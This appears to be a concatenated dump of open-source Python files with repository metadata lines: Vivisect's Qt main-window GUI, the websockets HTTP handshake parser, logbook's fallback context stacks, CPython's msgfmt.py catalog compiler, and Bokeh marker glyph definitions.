dock_right = QtCore.Qt.RightDockWidgetArea
class VQVivMainWindow(viv_base.VivEventDist, vq_app.VQMainCmdWindow):
# Child windows may emit this on "navigate" requests...
# vivNavSignal = QtCore.pyqtSignal(str, name='vivNavSignal')
vivMemColorSignal = QtCore.pyqtSignal(dict, name='vivMemColorSignal')
def __init__(self, vw):
self.vw = vw
vw._viv_gui = self
        # DEV: hijack the workspace's vprint so that messages get routed to the
        # UI canvas and not out to stdout
vw.vprint = self.vprint
viv_base.VivEventDist.__init__(self, vw=vw)
vq_app.VQMainCmdWindow.__init__(self, 'Vivisect', vw)
self.vqAddMenuField('&File.Open', self._menuFileOpen)
self.vqAddMenuField('&File.Save', self._menuFileSave)
self.vqAddMenuField('&File.Save As', self._menuFileSaveAs)
self.vqAddMenuField('&File.Save to Server', self._menuFileSaveServer)
self.vqAddMenuField('&File.Quit', self.close)
self.vqAddMenuField('&Edit.&Preferences', self._menuEditPrefs)
self.vqAddMenuField('&View.&Exports', self._menuViewExports)
self.vqAddMenuField('&View.&Functions', self._menuViewFunctions)
self.vqAddMenuField('&View.&Imports', self._menuViewImports)
self.vqAddMenuField('&View.&Names', self._menuViewNames)
self.vqAddMenuField('&View.&Memory', self._menuViewMemory)
self.vqAddMenuField('&View.&Function Graph', self._menuViewFuncGraph)
self.vqAddMenuField('&View.&Strings', self._menuViewStrings)
self.vqAddMenuField('&View.&Structures', self._menuViewStructs)
self.vqAddMenuField('&View.&Segments', self._menuViewSegments)
self.vqAddMenuField('&View.&Symboliks', self._menuViewSymboliks)
self.vqAddMenuField('&View.&Layouts.&Set Default', self._menuViewLayoutsSetDefault)
self.vqAddMenuField('&View.&Layouts.&Save', self._menuViewLayoutsSave)
self.vqAddMenuField('&View.&Layouts.&Load', self._menuViewLayoutsLoad)
self.vqAddMenuField('&Share.Share Workspace', self._menuShareWorkspace)
self.vqAddMenuField('&Share.Connect to Shared Workspace', self._menuShareConnect)
self.vqAddMenuField('&Share.Connect To Workspace Server', self._menuShareConnectServer)
self.vqAddMenuField('&Tools.&Python', self._menuToolsPython)
self.vqAddMenuField('&Tools.&Debug', self._menuToolsDebug)
self.vqAddMenuField('&Tools.&Structures.Add Namespace', self._menuToolsStructNames)
self.vqAddMenuField('&Tools.&Structures.New', self._menuToolsUStructNew)
self.vqAddDynMenu('&Tools.&Structures.&Edit', self._menuToolsUStructEdit)
self.vqAddDynMenu('&Tools.&Va Sets', self._menuToolsVaSets)
self.vqAddMenuField('&Window.&Fullscreen', self._menuWindowFullscreen)
self.vqAddMenuField('&Window.&Maximized', self._menuWindowMaximize)
self.vqAddMenuField('&Window.&Normal', self._menuWindowNormal)
self.vw.vprint('Welcome to Vivisect (Qt Edition)!')
self.vw.vprint('Random Tip: %s' % viv_q_tips.getRandomTip())
if len(self.vqGetDockWidgets()) == 0:
self.vw.vprint('\n')
self.vw.vprint('Looks like you have an empty layout!')
self.vw.vprint('Use View->Layouts->Load and select vivisect/qt/default.lyt')
fname = os.path.basename(self.vw.getMeta('StorageName', 'Unknown'))
self.setWindowTitle('Vivisect: %s' % fname)
self.windowState = QtCore.Qt.WindowNoState
self.addHotKey('ctrl+o', 'file:open')
self.addHotKeyTarget('file:open', self._menuFileOpen)
self.addHotKey('ctrl+s', 'file:save')
self.addHotKeyTarget('file:save', self._menuFileSave)
self.addHotKey('ctrl+w', 'file:quit')
self.addHotKeyTarget('file:quit', self.close)
def vprint(self, msg, addnl=True):
# ripped and modded from envi/cli.py
self.vw.canvas.write(msg)
if addnl:
self.vw.canvas.write('\n')
def getLocation(self, va):
loctup = self.vw.getLocation(va)
if loctup is None:
self.vw.vprint('Location not found!')
else:
name = loc_type_names.get(loctup[L_LTYPE], 'Unspecified')
self.vw.vprint('\nVA: %s' % hex(loctup[L_VA]))
self.vw.vprint(' Size: %d' % loctup[L_SIZE])
self.vw.vprint(' Type: %s' % name)
self.vw.vprint(' Info: %s' % str(loctup[L_TINFO]))
self.vw.vprint(' Repr: %s' % self.vw.reprLocation(loctup)[:64])
def setVaName(self, va, parent=None):
if parent is None:
parent = self
curname = self.vw.getName(va)
if curname is None:
curname = ''
name, ok = QInputDialog.getText(parent, 'Enter...', 'Name', text=curname)
if ok:
name = str(name)
if self.vw.vaByName(name):
raise Exception('Duplicate Name: %s' % name)
self.vw.makeName(va, name)
def setVaComment(self, va, parent=None):
if parent is None:
parent = self
curcomment = self.vw.getComment(va)
if curcomment is None:
curcomment = ''
comment, ok = QInputDialog.getText(parent, 'Enter...', 'Comment', text=curcomment)
if ok:
self.vw.setComment(va, str(comment))
def addVaXref(self, va, parent=None):
if parent is None:
parent = self
xtova, ok = QInputDialog.getText(parent, 'Enter...', 'Make Code Xref 0x%x -> ' % va)
if ok:
try:
val = self.vw.parseExpression(str(xtova))
if self.vw.isValidPointer(val):
self.vw.addXref(va, val, REF_CODE)
else:
self.vw.vprint("Invalid Expression: %s (%s)" % (xtova, val))
except Exception as e:
self.vw.vprint(repr(e))
def setFuncLocalName(self, fva, offset, atype, aname):
newname, ok = QInputDialog.getText(self, 'Enter...', 'Local Name')
if ok:
self.vw.setFunctionLocal(fva, offset, LSYM_NAME, (atype, str(newname)))
def setFuncArgName(self, fva, idx, atype, aname):
newname, ok = QInputDialog.getText(self, 'Enter...', 'Argument Name')
if ok:
self.vw.setFunctionArg(fva, idx, atype, str(newname))
def showFuncCallGraph(self, fva):
callview = viv_q_funcviews.FuncCallsView(self.vw)
callview.functionSelected(fva)
callview.show()
self.vqDockWidget(callview, floating=True)
def makeStruct(self, va, parent=None):
if parent is None:
parent = self
sname = vs_qt.selectStructure(self.vw.vsbuilder, parent=parent)
if sname is not None:
self.vw.makeStructure(va, sname)
return sname
def addBookmark(self, va, parent=None):
if parent is None:
parent = self
bname, ok = QInputDialog.getText(parent, 'Enter...', 'Bookmark Name')
if ok:
self.vw.setVaSetRow('Bookmarks', (va, str(bname)))
def _menuEditPrefs(self):
configs = []
configs.append(('Vivisect', self.vw.config.viv))
configs.append(('Vdb', self.vw.config.vdb))
self._cfg_widget = e_q_config.EnviConfigTabs(configs)
self._cfg_widget.show()
def _menuToolsUStructNew(self):
u = viv_q_ustruct.UserStructEditor(self.vw)
w = self.vqDockWidget(u, floating=True)
w.resize(600, 600)
def _menuToolsUStructEdit(self, name=None):
if name is None:
return self.vw.getUserStructNames()
u = viv_q_ustruct.UserStructEditor(self.vw, name=name)
w = self.vqDockWidget(u, floating=True)
w.resize(600, 600)
def _menuToolsVaSets(self, name=None):
if name is None:
return self.vw.getVaSetNames()
view = viv_q_views.VQVivVaSetView(self.vw, self, name)
self.vqDockWidget(view)
def delFunction(self, fva, parent=None):
if parent is None:
parent = self
yn, ok = QInputDialog.getItem(self, 'Delete Function', 'Confirm:', ('No', 'Yes'), 0, False)
if ok and yn == 'Yes':
self.vw.delFunction(fva)
def vqInitDockWidgetClasses(self):
exprloc = e_expr.MemoryExpressionLocals(self.vw, symobj=self.vw)
exprloc['vw'] = self.vw
exprloc['vwqgui'] = self
exprloc['vprint'] = self.vw.vprint
self.vqAddDockWidgetClass(viv_q_views.VQVivExportsView, args=(self.vw, self))
self.vqAddDockWidgetClass(viv_q_views.VQVivFunctionsView, args=(self.vw, self))
self.vqAddDockWidgetClass(viv_q_views.VQVivNamesView, args=(self.vw, self))
self.vqAddDockWidgetClass(viv_q_views.VQVivImportsView, args=(self.vw, self))
self.vqAddDockWidgetClass(viv_q_views.VQVivSegmentsView, args=(self.vw, self))
self.vqAddDockWidgetClass(viv_q_views.VQVivStringsView, args=(self.vw, self))
self.vqAddDockWidgetClass(viv_q_views.VQVivStructsView, args=(self.vw, self))
self.vqAddDockWidgetClass(vq_python.VQPythonView, args=(exprloc, self))
self.vqAddDockWidgetClass(viv_q_memory.VQVivMemoryView, args=(self.vw, self))
self.vqAddDockWidgetClass(viv_q_funcgraph.VQVivFuncgraphView, args=(self.vw, self))
self.vqAddDockWidgetClass(viv_q_symboliks.VivSymbolikFuncPane, args=(self.vw, self))
def vqRestoreGuiSettings(self, settings):
guid = self.vw.getVivGuid()
dwcls = settings.value('%s/DockClasses' % guid)
state = settings.value('%s/DockState' % guid)
geom = settings.value('%s/DockGeometry' % guid)
stub = '%s/' % guid
if compat_isNone(dwcls):
names = list(self.vw.filemeta.keys())
names.sort()
name = '+'.join(names)
dwcls = settings.value('%s/DockClasses' % name)
state = settings.value('%s/DockState' % name)
geom = settings.value('%s/DockGeometry' % name)
stub = '%s/' % name
if compat_isNone(dwcls):
dwcls = settings.value('DockClasses')
state = settings.value('DockState')
geom = settings.value('DockGeometry')
stub = ''
if not compat_isNone(dwcls):
for i, clsname in enumerate(dwcls):
name = 'VQDockWidget%d' % i
try:
tup = self.vqBuildDockWidget(str(clsname), floating=False)
if tup is not None:
d, obj = tup
d.setObjectName(name)
d.vqRestoreState(settings, name, stub)
d.show()
except Exception as e:
self.vw.vprint('Error Building: %s: %s' % (clsname, e))
# Once dock widgets are loaded, we can restoreState
if not compat_isNone(state):
self.restoreState(state)
if not compat_isNone(geom):
self.restoreGeometry(geom)
# Just get all the resize activities done...
vq_main.eatevents()
for w in self.vqGetDockWidgets():
w.show()
return True
def vqSaveGuiSettings(self, settings):
dock_classes = []
guid = self.vw.getVivGuid()
names = list(self.vw.filemeta.keys())
names.sort()
vivname = '+'.join(names)
# Enumerate the current dock windows and set
# their names by their list order...
for i, w in enumerate(self.vqGetDockWidgets()):
widget = w.widget()
dock_classes.append(widget.__class__.__name__)
name = 'VQDockWidget%d' % i
w.setObjectName(name)
w.vqSaveState(settings, '%s/%s' % (guid, name))
w.vqSaveState(settings, '%s/%s' % (vivname, name))
geom = self.saveGeometry()
state = self.saveState()
# first store for this specific workspace
settings.setValue('%s/DockClasses' % guid, dock_classes)
settings.setValue('%s/DockGeometry' % guid, geom)
settings.setValue('%s/DockState' % guid, state)
# next store for this filename
settings.setValue('%s/DockClasses' % vivname, dock_classes)
settings.setValue('%s/DockGeometry' % vivname, geom)
settings.setValue('%s/DockState' % vivname, state)
# don't store the default. that should be saved manually
def vqGetDockWidgetsByName(self, name='viv', firstonly=False):
'''
Get list of DockWidgets matching a given name (default is 'viv').
        Returns a list of tuples (window, DockWidget).
        If firstonly==True, returns the first tuple instead of a list.
'''
out = []
for vqDW in self.vqGetDockWidgets():
w = vqDW.widget()
if hasattr(w, 'getEnviNavName') and w.getEnviNavName() == name:
if firstonly:
return w, vqDW
                out.append((w, vqDW))
return out
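    # Hedged usage sketch (assumes a live window instance; the nav name
    # 'funcgraph' is hypothetical -- the default is 'viv'):
    #   hit = self.vqGetDockWidgetsByName('funcgraph', firstonly=True)
    #   if hit:
    #       widget, dock = hit
    #       dock.show()
    #       dock.raise_()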
def _menuToolsDebug(self):
viv_vdbext.runVdb(self)
def _menuViewFuncGraph(self):
self.vqBuildDockWidget('VQVivFuncgraphView', area=QtCore.Qt.TopDockWidgetArea)
def _menuViewSymboliks(self):
self.vqBuildDockWidget('VivSymbolikFuncPane', area=QtCore.Qt.TopDockWidgetArea)
def _menuFileOpen(self):
# TODO: Add something to change the workspace storage name,
# and also to list the currently loaded files
# Right now it'll successively create storage files
fname = getOpenFileName(self, 'Open...')
if fname is None or not len(fname):
return
self.vw.vprint('Opening %s' % fname)
self.setWindowTitle('Vivisect: %s' % fname)
self.vw.loadFromFile(str(fname))
self.vw.vprint('Analyzing %s' % fname)
self.vw.analyze()
self.vw.vprint('%s is ready!' % fname)
@vq_main.workthread
def _menuFileSave(self, fullsave=False):
self.vw.vprint('Saving workspace...')
try:
self.vw.saveWorkspace(fullsave=fullsave)
except Exception as e:
self.vw.vprint(str(e))
else:
self.vw.vprint('complete!')
def _menuFileSaveAs(self):
fname = getSaveFileName(self, 'Save As...')
if fname is None or not len(fname):
return
self.vw.setMeta('StorageName', fname)
self._menuFileSave(fullsave=True)
def _menuFileSaveServer(self):
viv_q_remote.saveToServer(self.vw, parent=self)
def _menuViewLayoutsLoad(self):
fname = getOpenFileName(self, 'Load Layout')
        if fname is None or not len(fname):
return
settings = QtCore.QSettings(fname, QtCore.QSettings.IniFormat)
self.vqRestoreGuiSettings(settings)
def _menuViewLayoutsSave(self):
fname = getSaveFileName(self, 'Save Layout')
if fname is None or not len(fname):
return
settings = QtCore.QSettings(fname, QtCore.QSettings.IniFormat)
self.vqSaveGuiSettings(settings)
def _menuViewLayoutsSetDefault(self):
vq_app.VQMainCmdWindow.vqSaveGuiSettings(self, self._vq_settings)
def _menuToolsStructNames(self):
nsinfo = vs_qt.selectStructNamespace()
if nsinfo is not None:
nsname, modname = nsinfo
self.vw.vprint('Adding struct namespace: %s' % nsname)
self.vw.addStructureModule(nsname, modname)
def _menuShareWorkspace(self):
self.vw.vprint('Sharing workspace...')
daemon = viv_share.shareWorkspace(self.vw)
self.vw.vprint('Workspace Listening Port: %d' % daemon.port)
self.vw.vprint('Clients may now connect to your host on port %d' % daemon.port)
def _menuShareConnect(self):
viv_q_remote.openSharedWorkspace(self.vw, parent=self)
def _menuShareConnectServer(self):
viv_q_remote.openServerAndWorkspace(self.vw, parent=self)
def _menuToolsPython(self):
self.vqBuildDockWidget('VQPythonView', area=QtCore.Qt.RightDockWidgetArea)
def _menuViewStrings(self):
self.vqBuildDockWidget('VQVivStringsView', area=QtCore.Qt.RightDockWidgetArea)
def _menuViewStructs(self):
self.vqBuildDockWidget('VQVivStructsView', area=QtCore.Qt.RightDockWidgetArea)
def _menuViewSegments(self):
self.vqBuildDockWidget('VQVivSegmentsView', area=QtCore.Qt.RightDockWidgetArea)
def _menuViewImports(self):
self.vqBuildDockWidget('VQVivImportsView', area=QtCore.Qt.RightDockWidgetArea)
def _menuViewExports(self):
self.vqBuildDockWidget('VQVivExportsView', area=QtCore.Qt.RightDockWidgetArea)
def _menuViewFunctions(self):
self.vqBuildDockWidget('VQVivFunctionsView', area=QtCore.Qt.RightDockWidgetArea)
def _menuViewNames(self):
self.vqBuildDockWidget('VQVivNamesView', area=QtCore.Qt.RightDockWidgetArea)
def _menuViewMemory(self):
self.vqBuildDockWidget('VQVivMemoryView', area=QtCore.Qt.TopDockWidgetArea)
    def _menuWindowFullscreen(self):
        # windowState() is a Qt method; let the show*() calls update the
        # state rather than assigning over the method name.
        if not self.windowState() & QtCore.Qt.WindowFullScreen:
            self.showFullScreen()
        else:
            self._menuWindowNormal()
    def _menuWindowMaximize(self):
        if not self.windowState() & QtCore.Qt.WindowMaximized:
            self.showMaximized()
    def _menuWindowNormal(self):
        if self.windowState() & (QtCore.Qt.WindowFullScreen | QtCore.Qt.WindowMaximized):
            self.showNormal()
@vq_main.idlethread
def _ve_fireEvent(self, event, edata):
return viv_base.VivEventDist._ve_fireEvent(self, event, edata)
@vq_main.idlethread
def runqt(vw, closeme=None):
'''
Use this API to instantiate a QT main window and show it when
there is already a main thread running...
'''
mw = VQVivMainWindow(vw)
viv_extensions.loadExtensions(vw, mw)
mw.show()
if closeme:
closeme.close()
return mw
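# Hedged usage sketch (the workspace file name is hypothetical); runqt() is
# for the case where a Qt event loop is already running, e.g. from another tool:
#   vw = viv_cli.VivCli()
#   vw.loadWorkspace('target.viv')
#   mw = runqt(vw)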
def main(vw):
vq_main.startup(css=vq_colors.qt_matrix)
mw = VQVivMainWindow(vw)
viv_extensions.loadExtensions(vw, mw)
mw.show()
vq_main.main()
if __name__ == '__main__':
vw = viv_cli.VivCli()
if len(sys.argv) == 2:
vw.loadWorkspace(sys.argv[1])
main(vw)
| apache-2.0 |
tashaxe/Red-DiscordBot | lib/websockets/http.py | 8 | 2888 | """
The :mod:`websockets.http` module provides HTTP parsing functions. They're
merely adequate for the WebSocket handshake messages.
These functions cannot be imported from :mod:`websockets`; they must be
imported from :mod:`websockets.http`.
"""
import asyncio
import email.parser
import io
import sys
from .version import version as websockets_version
__all__ = ['read_request', 'read_response', 'USER_AGENT']
MAX_HEADERS = 256
MAX_LINE = 4096
USER_AGENT = ' '.join((
'Python/{}'.format(sys.version[:3]),
'websockets/{}'.format(websockets_version),
))
@asyncio.coroutine
def read_request(stream):
"""
Read an HTTP/1.1 request from ``stream``.
Return ``(path, headers)`` where ``path`` is a :class:`str` and
``headers`` is a :class:`~email.message.Message`. ``path`` isn't
URL-decoded.
Raise an exception if the request isn't well formatted.
The request is assumed not to contain a body.
"""
request_line, headers = yield from read_message(stream)
method, path, version = request_line[:-2].decode().split(None, 2)
if method != 'GET':
raise ValueError("Unsupported method")
if version != 'HTTP/1.1':
raise ValueError("Unsupported HTTP version")
return path, headers
@asyncio.coroutine
def read_response(stream):
"""
Read an HTTP/1.1 response from ``stream``.
Return ``(status, headers)`` where ``status`` is a :class:`int` and
``headers`` is a :class:`~email.message.Message`.
Raise an exception if the request isn't well formatted.
The response is assumed not to contain a body.
"""
status_line, headers = yield from read_message(stream)
version, status, reason = status_line[:-2].decode().split(" ", 2)
if version != 'HTTP/1.1':
raise ValueError("Unsupported HTTP version")
return int(status), headers
@asyncio.coroutine
def read_message(stream):
"""
Read an HTTP message from ``stream``.
Return ``(start_line, headers)`` where ``start_line`` is :class:`bytes`
and ``headers`` is a :class:`~email.message.Message`.
The message is assumed not to contain a body.
"""
start_line = yield from read_line(stream)
header_lines = io.BytesIO()
for num in range(MAX_HEADERS):
header_line = yield from read_line(stream)
header_lines.write(header_line)
if header_line == b'\r\n':
break
else:
raise ValueError("Too many headers")
header_lines.seek(0)
headers = email.parser.BytesHeaderParser().parse(header_lines)
return start_line, headers
@asyncio.coroutine
def read_line(stream):
"""
Read a single line from ``stream``.
"""
line = yield from stream.readline()
if len(line) > MAX_LINE:
raise ValueError("Line too long")
if not line.endswith(b'\r\n'):
raise ValueError("Line without CRLF")
return line
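# Hedged sketch (not part of the original module): drives read_request()
# against an in-memory StreamReader; the request bytes below are illustrative.
def _example_read_request():
    loop = asyncio.get_event_loop()
    stream = asyncio.StreamReader(loop=loop)
    stream.feed_data(b'GET /chat HTTP/1.1\r\nHost: example.com\r\n\r\n')
    path, headers = loop.run_until_complete(read_request(stream))
    assert path == '/chat' and headers['Host'] == 'example.com'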
| gpl-3.0 |
zacharyvoase/logbook | logbook/_fallback.py | 11 | 4596 | # -*- coding: utf-8 -*-
"""
logbook._fallback
~~~~~~~~~~~~~~~~~
Fallback implementations in case speedups is not around.
:copyright: (c) 2010 by Armin Ronacher, Georg Brandl.
:license: BSD, see LICENSE for more details.
"""
import threading
from itertools import count
from thread import get_ident as current_thread
_missing = object()
_MAX_CONTEXT_OBJECT_CACHE = 256
def group_reflected_property(name, default, fallback=_missing):
"""Returns a property for a given name that falls back to the
value of the group if set. If there is no such group, the
provided default is used.
"""
def _get(self):
rv = getattr(self, '_' + name, _missing)
if rv is not _missing and rv != fallback:
return rv
if self.group is None:
return default
return getattr(self.group, name)
def _set(self, value):
setattr(self, '_' + name, value)
def _del(self):
delattr(self, '_' + name)
return property(_get, _set, _del)
class _StackBound(object):
def __init__(self, obj, push, pop):
self.__obj = obj
self.__push = push
self.__pop = pop
def __enter__(self):
self.__push()
return self.__obj
def __exit__(self, exc_type, exc_value, tb):
self.__pop()
class StackedObject(object):
"""Baseclass for all objects that provide stack manipulation
operations.
"""
def push_thread(self):
"""Pushes the stacked object to the thread stack."""
raise NotImplementedError()
def pop_thread(self):
"""Pops the stacked object from the thread stack."""
raise NotImplementedError()
def push_application(self):
"""Pushes the stacked object to the application stack."""
raise NotImplementedError()
def pop_application(self):
"""Pops the stacked object from the application stack."""
raise NotImplementedError()
def __enter__(self):
self.push_thread()
return self
def __exit__(self, exc_type, exc_value, tb):
self.pop_thread()
def threadbound(self, _cls=_StackBound):
"""Can be used in combination with the `with` statement to
execute code while the object is bound to the thread.
"""
return _cls(self, self.push_thread, self.pop_thread)
def applicationbound(self, _cls=_StackBound):
"""Can be used in combination with the `with` statement to
execute code while the object is bound to the application.
"""
return _cls(self, self.push_application, self.pop_application)
class ContextStackManager(object):
"""Helper class for context objects that manages a stack of
objects.
"""
def __init__(self):
self._global = []
self._context_lock = threading.Lock()
self._context = threading.local()
self._cache = {}
self._stackop = count().next
def iter_context_objects(self):
"""Returns an iterator over all objects for the combined
application and context cache.
"""
tid = current_thread()
objects = self._cache.get(tid)
if objects is None:
if len(self._cache) > _MAX_CONTEXT_OBJECT_CACHE:
self._cache.clear()
objects = self._global[:]
objects.extend(getattr(self._context, 'stack', ()))
objects.sort(reverse=True)
objects = [x[1] for x in objects]
self._cache[tid] = objects
return iter(objects)
def push_thread(self, obj):
self._context_lock.acquire()
try:
self._cache.pop(current_thread(), None)
item = (self._stackop(), obj)
stack = getattr(self._context, 'stack', None)
if stack is None:
self._context.stack = [item]
else:
stack.append(item)
finally:
self._context_lock.release()
def pop_thread(self):
self._context_lock.acquire()
try:
self._cache.pop(current_thread(), None)
stack = getattr(self._context, 'stack', None)
assert stack, 'no objects on stack'
return stack.pop()[1]
finally:
self._context_lock.release()
def push_application(self, obj):
self._global.append((self._stackop(), obj))
self._cache.clear()
def pop_application(self):
assert self._global, 'no objects on application stack'
popped = self._global.pop()[1]
self._cache.clear()
return popped
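# Hedged sketch (illustrative, not part of logbook): the push/pop discipline
# of ContextStackManager; plain strings stand in for real handler objects.
def _example_context_stack():
    mgr = ContextStackManager()
    mgr.push_application('app-handler')
    mgr.push_thread('thread-handler')
    # thread-bound objects take precedence over application-bound ones
    assert list(mgr.iter_context_objects()) == ['thread-handler', 'app-handler']
    mgr.pop_thread()
    mgr.pop_application()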
| bsd-3-clause |
Belxjander/Kirito | Python-3.5.0-main/Tools/i18n/msgfmt.py | 59 | 7033 | #! /usr/bin/env python3
# Written by Martin v. Löwis <loewis@informatik.hu-berlin.de>
"""Generate binary message catalog from textual translation description.
This program converts a textual Uniforum-style message catalog (.po file) into
a binary GNU catalog (.mo file). This is essentially the same function as the
GNU msgfmt program, however, it is a simpler implementation.
Usage: msgfmt.py [OPTIONS] filename.po
Options:
-o file
--output-file=file
Specify the output file to write to. If omitted, output will go to a
file named filename.mo (based off the input file name).
-h
--help
Print this message and exit.
-V
--version
Display version information and exit.
"""
import os
import sys
import ast
import getopt
import struct
import array
from email.parser import HeaderParser
__version__ = "1.1"
MESSAGES = {}
def usage(code, msg=''):
print(__doc__, file=sys.stderr)
if msg:
print(msg, file=sys.stderr)
sys.exit(code)
def add(id, str, fuzzy):
"Add a non-fuzzy translation to the dictionary."
global MESSAGES
if not fuzzy and str:
MESSAGES[id] = str
def generate():
"Return the generated output."
global MESSAGES
# the keys are sorted in the .mo file
keys = sorted(MESSAGES.keys())
offsets = []
ids = strs = b''
for id in keys:
# For each string, we need size and file offset. Each string is NUL
# terminated; the NUL does not count into the size.
offsets.append((len(ids), len(id), len(strs), len(MESSAGES[id])))
ids += id + b'\0'
strs += MESSAGES[id] + b'\0'
    # The header is 7 32-bit unsigned integers.  We don't use hash tables, so
    # the keys start right after the index tables.
keystart = 7*4+16*len(keys)
# and the values start after the keys
valuestart = keystart + len(ids)
koffsets = []
voffsets = []
# The string table first has the list of keys, then the list of values.
# Each entry has first the size of the string, then the file offset.
for o1, l1, o2, l2 in offsets:
koffsets += [l1, o1+keystart]
voffsets += [l2, o2+valuestart]
offsets = koffsets + voffsets
output = struct.pack("Iiiiiii",
0x950412de, # Magic
0, # Version
len(keys), # # of entries
7*4, # start of key index
7*4+len(keys)*8, # start of value index
0, 0) # size and offset of hash table
output += array.array("i", offsets).tostring()
output += ids
output += strs
return output
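# Hedged sketch (not in the original tool): sanity-check the header layout
# that generate() emits, using the same struct format.
def _example_check_header(mo_bytes):
    magic, version, numentries = struct.unpack("Iii", mo_bytes[:12])
    assert magic == 0x950412de and version == 0
    return numentries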
def make(filename, outfile):
ID = 1
STR = 2
# Compute .mo name from .po name and arguments
if filename.endswith('.po'):
infile = filename
else:
infile = filename + '.po'
if outfile is None:
outfile = os.path.splitext(infile)[0] + '.mo'
try:
lines = open(infile, 'rb').readlines()
except IOError as msg:
print(msg, file=sys.stderr)
sys.exit(1)
section = None
fuzzy = 0
# Start off assuming Latin-1, so everything decodes without failure,
# until we know the exact encoding
encoding = 'latin-1'
# Parse the catalog
lno = 0
for l in lines:
l = l.decode(encoding)
lno += 1
# If we get a comment line after a msgstr, this is a new entry
if l[0] == '#' and section == STR:
add(msgid, msgstr, fuzzy)
section = None
fuzzy = 0
# Record a fuzzy mark
if l[:2] == '#,' and 'fuzzy' in l:
fuzzy = 1
# Skip comments
if l[0] == '#':
continue
# Now we are in a msgid section, output previous section
if l.startswith('msgid') and not l.startswith('msgid_plural'):
if section == STR:
add(msgid, msgstr, fuzzy)
if not msgid:
# See whether there is an encoding declaration
p = HeaderParser()
charset = p.parsestr(msgstr.decode(encoding)).get_content_charset()
if charset:
encoding = charset
section = ID
l = l[5:]
msgid = msgstr = b''
is_plural = False
# This is a message with plural forms
elif l.startswith('msgid_plural'):
if section != ID:
print('msgid_plural not preceded by msgid on %s:%d' % (infile, lno),
file=sys.stderr)
sys.exit(1)
l = l[12:]
msgid += b'\0' # separator of singular and plural
is_plural = True
# Now we are in a msgstr section
elif l.startswith('msgstr'):
section = STR
if l.startswith('msgstr['):
if not is_plural:
print('plural without msgid_plural on %s:%d' % (infile, lno),
file=sys.stderr)
sys.exit(1)
l = l.split(']', 1)[1]
if msgstr:
msgstr += b'\0' # Separator of the various plural forms
else:
if is_plural:
print('indexed msgstr required for plural on %s:%d' % (infile, lno),
file=sys.stderr)
sys.exit(1)
l = l[6:]
# Skip empty lines
l = l.strip()
if not l:
continue
l = ast.literal_eval(l)
if section == ID:
msgid += l.encode(encoding)
elif section == STR:
msgstr += l.encode(encoding)
else:
print('Syntax error on %s:%d' % (infile, lno), \
'before:', file=sys.stderr)
print(l, file=sys.stderr)
sys.exit(1)
# Add last entry
if section == STR:
add(msgid, msgstr, fuzzy)
# Compute output
output = generate()
try:
open(outfile,"wb").write(output)
except IOError as msg:
print(msg, file=sys.stderr)
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], 'hVo:',
['help', 'version', 'output-file='])
except getopt.error as msg:
usage(1, msg)
outfile = None
# parse options
for opt, arg in opts:
if opt in ('-h', '--help'):
usage(0)
elif opt in ('-V', '--version'):
print("msgfmt.py", __version__)
sys.exit(0)
elif opt in ('-o', '--output-file'):
outfile = arg
# do it
if not args:
print('No input file given', file=sys.stderr)
print("Try `msgfmt --help' for more information.", file=sys.stderr)
return
for filename in args:
make(filename, outfile)
if __name__ == '__main__':
main()
| gpl-3.0 |
roxyboy/bokeh | bokeh/models/markers.py | 33 | 5595 | """ Glyph renderer models for displaying simple scatter-type
markers on Bokeh plots.
"""
from __future__ import absolute_import
from .glyphs import Glyph
from ..enums import enumeration
from ..mixins import FillProps, LineProps
from ..properties import DistanceSpec, Enum, Include, NumberSpec, ScreenDistanceSpec
class Marker(Glyph):
""" Base class for glyphs that are simple markers with line and
fill properties, located at an (x, y) location with a specified
size.
.. note::
For simplicity, all markers have both line and fill properties
declared, however some markers (`Asterisk`, `Cross`, `X`) only
draw lines. For these markers, the fill values are simply
ignored.
"""
x = NumberSpec("x", help="""
The x-axis coordinates for the center of the markers.
""")
y = NumberSpec("y", help="""
The y-axis coordinates for the center of the markers.
""")
size = ScreenDistanceSpec(default=4, help="""
The size (diameter) values for the markers. Interpreted as
"screen space" units by default.
""")
angle = NumberSpec("angle", help="""
The angles to rotate the markers.
""")
line_props = Include(LineProps, use_prefix=False, help="""
The %s values for the markers.
""")
fill_props = Include(FillProps, use_prefix=False, help="""
The %s values for the markers.
""")
class Asterisk(Marker):
""" Render asterisk '*' markers.
Example
-------
.. bokeh-plot:: ../tests/glyphs/Asterisk.py
:source-position: none
*source:* ``tests/glyphs/Asterisk.py``
"""
class Circle(Marker):
""" Render circle markers.
Example
-------
.. bokeh-plot:: ../tests/glyphs/Circle.py
:source-position: none
*source:* ``tests/glyphs/Circle.py``
"""
radius = DistanceSpec("radius", help="""
The radius values for circle markers. Interpreted in
"data space" units by default.
.. note::
Circle markers are slightly unusual in that they support specifying
a radius in addition to a size. Only one of ``radius`` or ``size``
should be given.
.. warning::
Note that ``Circle`` glyphs are always drawn as circles on the screen,
even in cases where the data space aspect ratio is not 1-1. In all
cases where radius or size units are specified as "data", the
"distance" for the radius is measured along the horizontal axis.
If the aspect ratio is very large or small, the drawn circles may
appear much larger or smaller than expected. See :bokeh-issue:`626`
for more information.
""")
radius_dimension = Enum(enumeration('x', 'y'), help="""
What dimension to measure circle radii along.
When the data space aspect ratio is not 1-1, then the size of the drawn
circles depends on what direction is used to measure the "distance" of
the radius. This property allows that direction to be controlled.
""")
class CircleCross(Marker):
""" Render circle markers with a '+' cross through the center.
Example
-------
.. bokeh-plot:: ../tests/glyphs/CircleCross.py
:source-position: none
*source:* ``tests/glyphs/CircleCross.py``
"""
class CircleX(Marker):
""" Render circle markers with an 'X' cross through the center.
Example
-------
.. bokeh-plot:: ../tests/glyphs/CircleX.py
:source-position: none
*source:* ``tests/glyphs/CircleX.py``
"""
class Cross(Marker):
""" Render '+' cross markers.
Example
-------
.. bokeh-plot:: ../tests/glyphs/Cross.py
:source-position: none
*source:* ``tests/glyphs/Cross.py``
"""
class Diamond(Marker):
""" Render diamond markers.
Example
-------
.. bokeh-plot:: ../tests/glyphs/Diamond.py
:source-position: none
*source:* ``tests/glyphs/Diamond.py``
"""
class DiamondCross(Marker):
""" Render diamond markers with a '+' cross through the center.
Example
-------
.. bokeh-plot:: ../tests/glyphs/DiamondCross.py
:source-position: none
*source:* ``tests/glyphs/DiamondCross.py``
"""
class InvertedTriangle(Marker):
""" Render upside-down triangle markers.
Example
-------
.. bokeh-plot:: ../tests/glyphs/InvertedTriangle.py
:source-position: none
*source:* ``tests/glyphs/InvertedTriangle.py``
"""
class Square(Marker):
""" Render a square marker, optionally rotated.
Example
-------
